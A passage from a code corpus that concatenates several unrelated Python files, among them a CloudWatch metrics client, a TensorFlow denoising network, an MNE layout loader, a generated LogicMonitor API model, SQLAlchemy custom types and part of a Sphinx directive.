"Bits",
"Kilobits",
"Megabits",
"Gigabits",
"Terabits",
"Percent",
"Count",
"Bytes/Second",
"Kilobytes/Second",
"Megabytes/Second",
"Gigabytes/Second",
"Terabytes/Second",
"Bits/Second",
"Kilobits/Second",
"Megabits/Second",
"Gigabits/Second",
"Terabits/Second",
"Count/Second",
]
Value = Union[int, float]
Values = dict[Union[int, float], Union[int, float]] # value: count
@datacls
class Statistics:
"""
Statistics measurement type.
Attributes:
• count: count of measured values
• sum: sum of all measured values
• minimum: minimum measured value
• maximum: maximum measured value
"""
count: Union[int, float]
sum: Union[int, float]
minimum: Union[int, float]
maximum: Union[int, float]
@datacls
class Metric:
"""
CloudWatch metric type.
Attributes:
• name: name of the CloudWatch metric
• dimensions: name/value pair of categories for characteristics
• value: value of measurement
• timestamp: date and time of the measurement to record
• unit: Optional[Unit]
• resolution: granularity of the metric
"""
name: str
dimensions: dict[str, str]
value: Union[Value, Values, Statistics]
timestamp: datetime
unit: Optional[Unit]
resolution: Optional[int]
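# Hedged example (not part of the original module): building a simple count metric
# with the fields documented above. The name, dimension and value are hypothetical,
# and @datacls is assumed to accept keyword arguments like a standard dataclass.
def _example_count_metric() -> Metric:
    return Metric(
        name="requests",
        dimensions={"service": "api"},
        value=1.0,
        timestamp=datetime.now(),
        unit="Count",
    )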
def cloudwatch_resource(
*,
service: Service = None,
policies: Iterable[Policy] = None,
):
"""
Create CloudWatch resource.
Parameters:
• service: CloudWatch service object
• policies: security policies to apply to all operations
"""
if service is None:
service = Service("cloudwatch")
if service.name != "cloudwatch":
raise TypeError("expecting cloudwatch service object")
@resource
class NamespaceResource:
"""Create Namespace resource."""
def __init__(self, name: str):
self.name = name
@operation(policies=policies)
async def post(self, metrics: Iterable[Metric]):
metrics = deque(metrics)
data = []
while metrics:
metric = metrics.popleft()
datum = {
"MetricName": metric.name,
"Dimensions": [
{"Name": k, "Value": v} for k, v in metric.dimensions.items()
],
"Timestamp": metric.timestamp,
}
if metric.unit:
datum["Unit"] = metric.unit
if metric.resolution:
datum["Resolution"] = metric.resolution
if isinstance(metric.value, (int, float)):
datum["Value"] = float(metric.value)
elif isinstance(metric.value, dict):
datum["Values"] = [float(v) for v in metric.value.keys()]
datum["Counts"] = [float(v) for v in metric.value.values()]
elif isinstance(metric.value, Statistics):
datum["StatisticValues"] = {
"SampleCount": float(metric.value.count),
"Sum": float(metric.value.sum),
"Minimum": float(metric.value.minimum),
"Maximum": float(metric.value.maximum),
}
data.append(datum)
if len(data) == 20 or not metrics:
client = await service.client()
await client.put_metric_data(Namespace=self.name, MetricData=data)
@resource
class CloudWatchResource:
"""Create CloudWatch resource."""
def namespace(self, name: str) -> NamespaceResource:
return NamespaceResource(name)
return CloudWatchResource()
class CloudWatchMonitor:
"""
A monitor that stores all recorded measurements in CloudWatch.
"""
# future: collect metrics, send in batches
def __init__(self, service: Service, namespace: str):
self.resource = cloudwatch_resource(service=service).namespace(namespace)
async def record(self, measurement: Measurement):
"""Record a measurement."""
if measurement.type == "counter":
m = Counter(timestamp=measurement.timestamp)
m.record(measurement.value)
metric = Metric(
name=measurement.tags["name"],
dimensions={"Name": measurement.type, "Value": str(m.value)},
timestamp=measurement.timestamp,
value=float(m.value),
unit="Count",
)
elif measurement.type == "gauge":
m = Gauge(timestamp=measurement.timestamp)
m.record(measurement.value)
metric = Metric(
name=measurement.tags["name"],
dimensions={"Name": measurement.type, "Value": str(measurement.value)},
timestamp=measurement.timestamp,
value=Statistics(
count=float(m.count),
sum=float(m.sum),
minimum=float(m.min),
maximum=float(m.max),
),
)
elif measurement.type == "absolute":
m = Absolute(timestamp=measurement.timestamp)
m.record(measurement.value)
metric = Metric(
name=measurement.tags["name"],
dimensions={"Name": measurement.type, "Value": str(m.value)},
timestamp=measurement.timestamp,
value=float(m.value),
)
await self.resource.post(metrics=[metric])
| 2.171875 | 2 |
dnn.py | OSU-slatelab/mask-vs-map | 1 | 12786462 | <gh_stars>1-10
import tensorflow as tf
import numpy as np
import tfsignal
class DNN():
"""
Fully-connected (DNN) architecture for speech denoising.
"""
def __init__(self,
inputs,
output_dim,
layers = 2,
units = 2048,
context = 5,
activation = tf.nn.relu,
dropout = 0.3,
output_type = ['fidelity'],
):
"""
Build the graph.
Parameters
----------
inputs : Placeholder
Spectral inputs to this model, of the shape (batchsize, frames, frequencies)
output_dim : int
Size of the output
layers : int
Number of fully-connected hidden layers
units : int
Number of units to put in each fc hidden layer
context : int
Number of context frames to include on each side of the current frame
activation : function
Function to apply before conv layers as an activation
dropout : float
Fraction of filters and nodes to drop
output_type : list of str
Output heads to build ('fidelity' and/or 'masking')
Returns
-------
Tensor
Outputs of the dropnet model
"""
# Store hyperparameters
self.inputs = inputs
self.activation = activation
self.dropout = dropout
self.training = tf.placeholder(tf.bool)
# Pad inputs for contextual frames
padding = [[0, 0], [0, 0], [context, context], [0, 0]]
padded_inputs = tf.pad(inputs, padding, "REFLECT")
#self.final_input = padded_inputs
# We want to apply the DNN to overlapping regions of the input... so use CNN to implement the DNN!
# Use filter size of frames x frequency x units
fc = tf.layers.conv2d(
inputs = padded_inputs,
filters = units,
kernel_size = [2*context+1, padded_inputs.get_shape()[-1]],
activation = activation,
data_format = 'channels_first',
name = 'fc0',
)
# Put channels last for DNN
fc = tf.transpose(fc, [0, 2, 3, 1])
fc = tf.layers.dropout(fc, rate=dropout, training=self.training)
# Actual fully connected layers
for i in range(1, layers):
fc = tf.layers.dense(
inputs = fc,
units = units,
activation = activation,
name = f"fc{i}",
)
fc = tf.layers.dropout(
inputs = fc,
rate = dropout,
training = self.training,
)
self.outputs = tf.layers.dense(fc, output_dim)
self.outputs = tf.reshape(self.outputs, [1, 1, -1, output_dim])
# Compute outputs
input_min = tf.reduce_min(self.inputs)
self.scale_vars = []
if 'masking' in output_type:
self.masking = tf.identity(self.outputs)
self.outputs = tf.multiply(tf.sigmoid(self.outputs), self.inputs - input_min) + input_min
#if 'fidelity' in output_type:
# self.outputs = self.scale(self.outputs, name = 'mask', scale_init = 0.5)
# self.fidelity = self.fully_connected(flat, out_shape, name="fc_out")
# self.outputs += self.scale(self.fidelity, name = 'map', scale_init = 0.5)
#else:
# self.outputs = self.scale(self.outputs, name = 'mask')
elif 'fidelity' in output_type:
self.fidelity = tf.identity(self.outputs)
#if 'map-as-mask-mimic' in output_type:
# masked_by_map = tf.multiply(self.maskify(self.outputs), self.inputs - input_min) + input_min
# self.outputs = self.scale(masked_by_map, 'mask')
| 3.171875 | 3 |
mne/layouts/layout.py | mluessi/mne-python | 1 | 12786463 | <filename>mne/layouts/layout.py
import os.path as op
import numpy as np
class Layout(object):
"""Sensor layouts"""
def __init__(self, kind='Vectorview-all', path=None):
"""
Parameters
----------
kind : 'Vectorview-all' | 'CTF-275' | 'Vectorview-grad' | 'Vectorview-mag'
Type of layout (can also be custom for EEG)
path : string
Path to folder where to find the layout file.
"""
if path is None:
path = op.dirname(__file__)
lout_fname = op.join(path, kind + '.lout')
f = open(lout_fname)
f.readline() # skip first line
names = []
pos = []
for line in f:
splits = line.split()
if len(splits) == 7:
_, x, y, dx, dy, chkind, nb = splits
name = chkind + ' ' + nb
else:
_, x, y, dx, dy, name = splits
pos.append(np.array([x, y, dx, dy], dtype=np.float))
names.append(name)
pos = np.array(pos)
pos[:, 0] -= np.min(pos[:, 0])
pos[:, 1] -= np.min(pos[:, 1])
scaling = max(np.max(pos[:, 0]), np.max(pos[:, 1])) + pos[0, 2]
pos /= scaling
pos[:, :2] += 0.03
pos[:, :2] *= 0.97 / 1.03
pos[:, 2:] *= 0.94
f.close()
self.kind = kind
self.pos = pos
self.names = names
# if __name__ == '__main__':
#
# layout = Layout()
#
# import pylab as pl
# pl.rcParams['axes.edgecolor'] = 'w'
# pl.close('all')
# pl.figure(facecolor='k', )
#
# for i in range(5):
# # for i in range(len(pos)):
# ax = pl.axes(layout.pos[i], axisbg='k')
# ax.plot(np.random.randn(3), 'w')
# pl.xticks([], ())
# pl.yticks([], ())
# pl.gca().grid(color='w')
#
# pl.show()
| 2.609375 | 3 |
logicmonitor_sdk/models/device_data_source.py | JeremyTangCD/lm-sdk-python | 0 | 12786464 | # coding: utf-8
"""
LogicMonitor REST API
LogicMonitor is a SaaS-based performance monitoring platform that provides full visibility into complex, hybrid infrastructures, offering granular performance monitoring and actionable data and insights. logicmonitor_sdk enables you to manage your LogicMonitor account programmatically. # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from logicmonitor_sdk.models.device_datasource_graph import DeviceDatasourceGraph # noqa: F401,E501
from logicmonitor_sdk.models.tree_node import TreeNode # noqa: F401,E501
class DeviceDataSource(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'alert_status': 'str',
'auto_discovery': 'bool',
'data_source_display_name': 'str',
'device_id': 'int',
'device_name': 'str',
'created_on': 'int',
'collect_method': 'str',
'data_source_id': 'int',
'graphs': 'list[DeviceDatasourceGraph]',
'sdt_at': 'str',
'next_auto_discovery_on': 'int',
'id': 'int',
'alert_status_priority': 'int',
'alert_disable_status': 'str',
'data_source_description': 'str',
'overview_graphs': 'list[DeviceDatasourceGraph]',
'stop_monitoring': 'bool',
'assigned_on': 'int',
'is_multiple': 'bool',
'instance_number': 'int',
'updated_on': 'int',
'sdt_status': 'str',
'data_source_name': 'str',
'device_display_name': 'str',
'monitoring_instance_number': 'int',
'groups_disabled_this_source': 'list[TreeNode]',
'group_name': 'str',
'instance_auto_group_enabled': 'bool',
'alerting_disabled_on': 'TreeNode',
'data_source_type': 'str',
'status': 'int'
}
attribute_map = {
'alert_status': 'alertStatus',
'auto_discovery': 'autoDiscovery',
'data_source_display_name': 'dataSourceDisplayName',
'device_id': 'deviceId',
'device_name': 'deviceName',
'created_on': 'createdOn',
'collect_method': 'collectMethod',
'data_source_id': 'dataSourceId',
'graphs': 'graphs',
'sdt_at': 'sdtAt',
'next_auto_discovery_on': 'nextAutoDiscoveryOn',
'id': 'id',
'alert_status_priority': 'alertStatusPriority',
'alert_disable_status': 'alertDisableStatus',
'data_source_description': 'dataSourceDescription',
'overview_graphs': 'overviewGraphs',
'stop_monitoring': 'stopMonitoring',
'assigned_on': 'assignedOn',
'is_multiple': 'isMultiple',
'instance_number': 'instanceNumber',
'updated_on': 'updatedOn',
'sdt_status': 'sdtStatus',
'data_source_name': 'dataSourceName',
'device_display_name': 'deviceDisplayName',
'monitoring_instance_number': 'monitoringInstanceNumber',
'groups_disabled_this_source': 'groupsDisabledThisSource',
'group_name': 'groupName',
'instance_auto_group_enabled': 'instanceAutoGroupEnabled',
'alerting_disabled_on': 'alertingDisabledOn',
'data_source_type': 'dataSourceType',
'status': 'status'
}
def __init__(self, alert_status=None, auto_discovery=None, data_source_display_name=None, device_id=None, device_name=None, created_on=None, collect_method=None, data_source_id=None, graphs=None, sdt_at=None, next_auto_discovery_on=None, id=None, alert_status_priority=None, alert_disable_status=None, data_source_description=None, overview_graphs=None, stop_monitoring=None, assigned_on=None, is_multiple=None, instance_number=None, updated_on=None, sdt_status=None, data_source_name=None, device_display_name=None, monitoring_instance_number=None, groups_disabled_this_source=None, group_name=None, instance_auto_group_enabled=None, alerting_disabled_on=None, data_source_type=None, status=None): # noqa: E501
"""DeviceDataSource - a model defined in Swagger""" # noqa: E501
self._alert_status = None
self._auto_discovery = None
self._data_source_display_name = None
self._device_id = None
self._device_name = None
self._created_on = None
self._collect_method = None
self._data_source_id = None
self._graphs = None
self._sdt_at = None
self._next_auto_discovery_on = None
self._id = None
self._alert_status_priority = None
self._alert_disable_status = None
self._data_source_description = None
self._overview_graphs = None
self._stop_monitoring = None
self._assigned_on = None
self._is_multiple = None
self._instance_number = None
self._updated_on = None
self._sdt_status = None
self._data_source_name = None
self._device_display_name = None
self._monitoring_instance_number = None
self._groups_disabled_this_source = None
self._group_name = None
self._instance_auto_group_enabled = None
self._alerting_disabled_on = None
self._data_source_type = None
self._status = None
self.discriminator = None
if alert_status is not None:
self.alert_status = alert_status
if auto_discovery is not None:
self.auto_discovery = auto_discovery
if data_source_display_name is not None:
self.data_source_display_name = data_source_display_name
if device_id is not None:
self.device_id = device_id
if device_name is not None:
self.device_name = device_name
if created_on is not None:
self.created_on = created_on
if collect_method is not None:
self.collect_method = collect_method
if data_source_id is not None:
self.data_source_id = data_source_id
if graphs is not None:
self.graphs = graphs
if sdt_at is not None:
self.sdt_at = sdt_at
if next_auto_discovery_on is not None:
self.next_auto_discovery_on = next_auto_discovery_on
if id is not None:
self.id = id
if alert_status_priority is not None:
self.alert_status_priority = alert_status_priority
if alert_disable_status is not None:
self.alert_disable_status = alert_disable_status
if data_source_description is not None:
self.data_source_description = data_source_description
if overview_graphs is not None:
self.overview_graphs = overview_graphs
if stop_monitoring is not None:
self.stop_monitoring = stop_monitoring
if assigned_on is not None:
self.assigned_on = assigned_on
if is_multiple is not None:
self.is_multiple = is_multiple
if instance_number is not None:
self.instance_number = instance_number
if updated_on is not None:
self.updated_on = updated_on
if sdt_status is not None:
self.sdt_status = sdt_status
if data_source_name is not None:
self.data_source_name = data_source_name
if device_display_name is not None:
self.device_display_name = device_display_name
if monitoring_instance_number is not None:
self.monitoring_instance_number = monitoring_instance_number
if groups_disabled_this_source is not None:
self.groups_disabled_this_source = groups_disabled_this_source
if group_name is not None:
self.group_name = group_name
if instance_auto_group_enabled is not None:
self.instance_auto_group_enabled = instance_auto_group_enabled
if alerting_disabled_on is not None:
self.alerting_disabled_on = alerting_disabled_on
if data_source_type is not None:
self.data_source_type = data_source_type
if status is not None:
self.status = status
@property
def alert_status(self):
"""Gets the alert_status of this DeviceDataSource. # noqa: E501
:return: The alert_status of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._alert_status
@alert_status.setter
def alert_status(self, alert_status):
"""Sets the alert_status of this DeviceDataSource.
:param alert_status: The alert_status of this DeviceDataSource. # noqa: E501
:type: str
"""
self._alert_status = alert_status
@property
def auto_discovery(self):
"""Gets the auto_discovery of this DeviceDataSource. # noqa: E501
:return: The auto_discovery of this DeviceDataSource. # noqa: E501
:rtype: bool
"""
return self._auto_discovery
@auto_discovery.setter
def auto_discovery(self, auto_discovery):
"""Sets the auto_discovery of this DeviceDataSource.
:param auto_discovery: The auto_discovery of this DeviceDataSource. # noqa: E501
:type: bool
"""
self._auto_discovery = auto_discovery
@property
def data_source_display_name(self):
"""Gets the data_source_display_name of this DeviceDataSource. # noqa: E501
:return: The data_source_display_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._data_source_display_name
@data_source_display_name.setter
def data_source_display_name(self, data_source_display_name):
"""Sets the data_source_display_name of this DeviceDataSource.
:param data_source_display_name: The data_source_display_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._data_source_display_name = data_source_display_name
@property
def device_id(self):
"""Gets the device_id of this DeviceDataSource. # noqa: E501
:return: The device_id of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._device_id
@device_id.setter
def device_id(self, device_id):
"""Sets the device_id of this DeviceDataSource.
:param device_id: The device_id of this DeviceDataSource. # noqa: E501
:type: int
"""
self._device_id = device_id
@property
def device_name(self):
"""Gets the device_name of this DeviceDataSource. # noqa: E501
:return: The device_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._device_name
@device_name.setter
def device_name(self, device_name):
"""Sets the device_name of this DeviceDataSource.
:param device_name: The device_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._device_name = device_name
@property
def created_on(self):
"""Gets the created_on of this DeviceDataSource. # noqa: E501
:return: The created_on of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._created_on
@created_on.setter
def created_on(self, created_on):
"""Sets the created_on of this DeviceDataSource.
:param created_on: The created_on of this DeviceDataSource. # noqa: E501
:type: int
"""
self._created_on = created_on
@property
def collect_method(self):
"""Gets the collect_method of this DeviceDataSource. # noqa: E501
:return: The collect_method of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._collect_method
@collect_method.setter
def collect_method(self, collect_method):
"""Sets the collect_method of this DeviceDataSource.
:param collect_method: The collect_method of this DeviceDataSource. # noqa: E501
:type: str
"""
self._collect_method = collect_method
@property
def data_source_id(self):
"""Gets the data_source_id of this DeviceDataSource. # noqa: E501
:return: The data_source_id of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._data_source_id
@data_source_id.setter
def data_source_id(self, data_source_id):
"""Sets the data_source_id of this DeviceDataSource.
:param data_source_id: The data_source_id of this DeviceDataSource. # noqa: E501
:type: int
"""
self._data_source_id = data_source_id
@property
def graphs(self):
"""Gets the graphs of this DeviceDataSource. # noqa: E501
:return: The graphs of this DeviceDataSource. # noqa: E501
:rtype: list[DeviceDatasourceGraph]
"""
return self._graphs
@graphs.setter
def graphs(self, graphs):
"""Sets the graphs of this DeviceDataSource.
:param graphs: The graphs of this DeviceDataSource. # noqa: E501
:type: list[DeviceDatasourceGraph]
"""
self._graphs = graphs
@property
def sdt_at(self):
"""Gets the sdt_at of this DeviceDataSource. # noqa: E501
:return: The sdt_at of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._sdt_at
@sdt_at.setter
def sdt_at(self, sdt_at):
"""Sets the sdt_at of this DeviceDataSource.
:param sdt_at: The sdt_at of this DeviceDataSource. # noqa: E501
:type: str
"""
self._sdt_at = sdt_at
@property
def next_auto_discovery_on(self):
"""Gets the next_auto_discovery_on of this DeviceDataSource. # noqa: E501
:return: The next_auto_discovery_on of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._next_auto_discovery_on
@next_auto_discovery_on.setter
def next_auto_discovery_on(self, next_auto_discovery_on):
"""Sets the next_auto_discovery_on of this DeviceDataSource.
:param next_auto_discovery_on: The next_auto_discovery_on of this DeviceDataSource. # noqa: E501
:type: int
"""
self._next_auto_discovery_on = next_auto_discovery_on
@property
def id(self):
"""Gets the id of this DeviceDataSource. # noqa: E501
:return: The id of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this DeviceDataSource.
:param id: The id of this DeviceDataSource. # noqa: E501
:type: int
"""
self._id = id
@property
def alert_status_priority(self):
"""Gets the alert_status_priority of this DeviceDataSource. # noqa: E501
:return: The alert_status_priority of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._alert_status_priority
@alert_status_priority.setter
def alert_status_priority(self, alert_status_priority):
"""Sets the alert_status_priority of this DeviceDataSource.
:param alert_status_priority: The alert_status_priority of this DeviceDataSource. # noqa: E501
:type: int
"""
self._alert_status_priority = alert_status_priority
@property
def alert_disable_status(self):
"""Gets the alert_disable_status of this DeviceDataSource. # noqa: E501
:return: The alert_disable_status of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._alert_disable_status
@alert_disable_status.setter
def alert_disable_status(self, alert_disable_status):
"""Sets the alert_disable_status of this DeviceDataSource.
:param alert_disable_status: The alert_disable_status of this DeviceDataSource. # noqa: E501
:type: str
"""
self._alert_disable_status = alert_disable_status
@property
def data_source_description(self):
"""Gets the data_source_description of this DeviceDataSource. # noqa: E501
:return: The data_source_description of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._data_source_description
@data_source_description.setter
def data_source_description(self, data_source_description):
"""Sets the data_source_description of this DeviceDataSource.
:param data_source_description: The data_source_description of this DeviceDataSource. # noqa: E501
:type: str
"""
self._data_source_description = data_source_description
@property
def overview_graphs(self):
"""Gets the overview_graphs of this DeviceDataSource. # noqa: E501
:return: The overview_graphs of this DeviceDataSource. # noqa: E501
:rtype: list[DeviceDatasourceGraph]
"""
return self._overview_graphs
@overview_graphs.setter
def overview_graphs(self, overview_graphs):
"""Sets the overview_graphs of this DeviceDataSource.
:param overview_graphs: The overview_graphs of this DeviceDataSource. # noqa: E501
:type: list[DeviceDatasourceGraph]
"""
self._overview_graphs = overview_graphs
@property
def stop_monitoring(self):
"""Gets the stop_monitoring of this DeviceDataSource. # noqa: E501
:return: The stop_monitoring of this DeviceDataSource. # noqa: E501
:rtype: bool
"""
return self._stop_monitoring
@stop_monitoring.setter
def stop_monitoring(self, stop_monitoring):
"""Sets the stop_monitoring of this DeviceDataSource.
:param stop_monitoring: The stop_monitoring of this DeviceDataSource. # noqa: E501
:type: bool
"""
self._stop_monitoring = stop_monitoring
@property
def assigned_on(self):
"""Gets the assigned_on of this DeviceDataSource. # noqa: E501
:return: The assigned_on of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._assigned_on
@assigned_on.setter
def assigned_on(self, assigned_on):
"""Sets the assigned_on of this DeviceDataSource.
:param assigned_on: The assigned_on of this DeviceDataSource. # noqa: E501
:type: int
"""
self._assigned_on = assigned_on
@property
def is_multiple(self):
"""Gets the is_multiple of this DeviceDataSource. # noqa: E501
:return: The is_multiple of this DeviceDataSource. # noqa: E501
:rtype: bool
"""
return self._is_multiple
@is_multiple.setter
def is_multiple(self, is_multiple):
"""Sets the is_multiple of this DeviceDataSource.
:param is_multiple: The is_multiple of this DeviceDataSource. # noqa: E501
:type: bool
"""
self._is_multiple = is_multiple
@property
def instance_number(self):
"""Gets the instance_number of this DeviceDataSource. # noqa: E501
:return: The instance_number of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._instance_number
@instance_number.setter
def instance_number(self, instance_number):
"""Sets the instance_number of this DeviceDataSource.
:param instance_number: The instance_number of this DeviceDataSource. # noqa: E501
:type: int
"""
self._instance_number = instance_number
@property
def updated_on(self):
"""Gets the updated_on of this DeviceDataSource. # noqa: E501
:return: The updated_on of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._updated_on
@updated_on.setter
def updated_on(self, updated_on):
"""Sets the updated_on of this DeviceDataSource.
:param updated_on: The updated_on of this DeviceDataSource. # noqa: E501
:type: int
"""
self._updated_on = updated_on
@property
def sdt_status(self):
"""Gets the sdt_status of this DeviceDataSource. # noqa: E501
:return: The sdt_status of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._sdt_status
@sdt_status.setter
def sdt_status(self, sdt_status):
"""Sets the sdt_status of this DeviceDataSource.
:param sdt_status: The sdt_status of this DeviceDataSource. # noqa: E501
:type: str
"""
self._sdt_status = sdt_status
@property
def data_source_name(self):
"""Gets the data_source_name of this DeviceDataSource. # noqa: E501
:return: The data_source_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._data_source_name
@data_source_name.setter
def data_source_name(self, data_source_name):
"""Sets the data_source_name of this DeviceDataSource.
:param data_source_name: The data_source_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._data_source_name = data_source_name
@property
def device_display_name(self):
"""Gets the device_display_name of this DeviceDataSource. # noqa: E501
:return: The device_display_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._device_display_name
@device_display_name.setter
def device_display_name(self, device_display_name):
"""Sets the device_display_name of this DeviceDataSource.
:param device_display_name: The device_display_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._device_display_name = device_display_name
@property
def monitoring_instance_number(self):
"""Gets the monitoring_instance_number of this DeviceDataSource. # noqa: E501
:return: The monitoring_instance_number of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._monitoring_instance_number
@monitoring_instance_number.setter
def monitoring_instance_number(self, monitoring_instance_number):
"""Sets the monitoring_instance_number of this DeviceDataSource.
:param monitoring_instance_number: The monitoring_instance_number of this DeviceDataSource. # noqa: E501
:type: int
"""
self._monitoring_instance_number = monitoring_instance_number
@property
def groups_disabled_this_source(self):
"""Gets the groups_disabled_this_source of this DeviceDataSource. # noqa: E501
:return: The groups_disabled_this_source of this DeviceDataSource. # noqa: E501
:rtype: list[TreeNode]
"""
return self._groups_disabled_this_source
@groups_disabled_this_source.setter
def groups_disabled_this_source(self, groups_disabled_this_source):
"""Sets the groups_disabled_this_source of this DeviceDataSource.
:param groups_disabled_this_source: The groups_disabled_this_source of this DeviceDataSource. # noqa: E501
:type: list[TreeNode]
"""
self._groups_disabled_this_source = groups_disabled_this_source
@property
def group_name(self):
"""Gets the group_name of this DeviceDataSource. # noqa: E501
:return: The group_name of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._group_name
@group_name.setter
def group_name(self, group_name):
"""Sets the group_name of this DeviceDataSource.
:param group_name: The group_name of this DeviceDataSource. # noqa: E501
:type: str
"""
self._group_name = group_name
@property
def instance_auto_group_enabled(self):
"""Gets the instance_auto_group_enabled of this DeviceDataSource. # noqa: E501
:return: The instance_auto_group_enabled of this DeviceDataSource. # noqa: E501
:rtype: bool
"""
return self._instance_auto_group_enabled
@instance_auto_group_enabled.setter
def instance_auto_group_enabled(self, instance_auto_group_enabled):
"""Sets the instance_auto_group_enabled of this DeviceDataSource.
:param instance_auto_group_enabled: The instance_auto_group_enabled of this DeviceDataSource. # noqa: E501
:type: bool
"""
self._instance_auto_group_enabled = instance_auto_group_enabled
@property
def alerting_disabled_on(self):
"""Gets the alerting_disabled_on of this DeviceDataSource. # noqa: E501
:return: The alerting_disabled_on of this DeviceDataSource. # noqa: E501
:rtype: TreeNode
"""
return self._alerting_disabled_on
@alerting_disabled_on.setter
def alerting_disabled_on(self, alerting_disabled_on):
"""Sets the alerting_disabled_on of this DeviceDataSource.
:param alerting_disabled_on: The alerting_disabled_on of this DeviceDataSource. # noqa: E501
:type: TreeNode
"""
self._alerting_disabled_on = alerting_disabled_on
@property
def data_source_type(self):
"""Gets the data_source_type of this DeviceDataSource. # noqa: E501
:return: The data_source_type of this DeviceDataSource. # noqa: E501
:rtype: str
"""
return self._data_source_type
@data_source_type.setter
def data_source_type(self, data_source_type):
"""Sets the data_source_type of this DeviceDataSource.
:param data_source_type: The data_source_type of this DeviceDataSource. # noqa: E501
:type: str
"""
self._data_source_type = data_source_type
@property
def status(self):
"""Gets the status of this DeviceDataSource. # noqa: E501
:return: The status of this DeviceDataSource. # noqa: E501
:rtype: int
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this DeviceDataSource.
:param status: The status of this DeviceDataSource. # noqa: E501
:type: int
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(DeviceDataSource, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeviceDataSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 2.03125 | 2 |
ccvpn/models/types.py | CCrypto/ccvpn | 81 | 12786465 | <filename>ccvpn/models/types.py<gh_stars>10-100
from sqlalchemy import TypeDecorator, UnicodeText, String
from sqlalchemy.ext.mutable import Mutable
from sqlalchemy.dialects import postgresql # INET
import json
class JSONEncodedDict(TypeDecorator):
impl = UnicodeText
def process_bind_param(self, value, dialect):
if value:
return json.dumps(value)
else:
return None
def process_result_value(self, value, dialect):
if value is not None:
return json.loads(value)
else:
return dict()
class MutableDict(Mutable, dict):
@classmethod
def coerce(cls, key, value):
"Convert plain dictionaries to MutableDict."
if not isinstance(value, MutableDict):
if isinstance(value, dict):
return MutableDict(value)
# this call will raise ValueError
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
"Detect dictionary set events and emit change events."
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
"Detect dictionary del events and emit change events."
dict.__delitem__(self, key)
self.changed()
class INETWrapper(TypeDecorator):
impl = String
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgresql.INET())
else:
return dialect.type_descriptor(String())
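# A minimal usage sketch (hypothetical model, not part of this module): the
# MutableDict/JSONEncodedDict pair is meant to be combined via Mutable.as_mutable
# so that in-place dict mutations mark the row as dirty, while INETWrapper picks
# the native INET type on PostgreSQL and falls back to String elsewhere.
#
#   from sqlalchemy import Column, Integer
#   from sqlalchemy.ext.declarative import declarative_base
#
#   Base = declarative_base()
#
#   class Profile(Base):
#       __tablename__ = 'profiles'
#       id = Column(Integer, primary_key=True)
#       prefs = Column(MutableDict.as_mutable(JSONEncodedDict))
#       last_ip = Column(INETWrapper)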
| 2.21875 | 2 |
cyra/cyradoc.py | Theta-Dev/Cyra | 0 | 12786466 | <reponame>Theta-Dev/Cyra
from typing import List
import importlib
from sphinx.application import Sphinx
from sphinx.util import logging
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from docutils.statemachine import StringList
import cyra
logger = logging.getLogger(__name__)
class CyradocDirective(Directive):
required_arguments = 1
option_spec = {
'no-docstrings': directives.flag,
}
@staticmethod
def _get_class(cfg_path, location):
split_path = cfg_path.rsplit('.', 1)
if len(split_path) != 2:
logger.error('Cyradoc path must have the format <Module>.<Class>', location=location)
return None
modname, clsname = split_path
try:
mod = importlib.import_module(modname)
except ImportError:
logger.error('Cyradoc could not find module %s' % modname, location=location)
return None
try:
config_cls = getattr(mod, clsname)
except AttributeError:
logger.error('Cyradoc could not find class %s in module %s'
% (clsname, modname), location=location)
return None
if not issubclass(config_cls, cyra.Config):
logger.error('Class %s is not a Cyradoc class' % cfg_path, location=location)
return None
return config_cls
@staticmethod
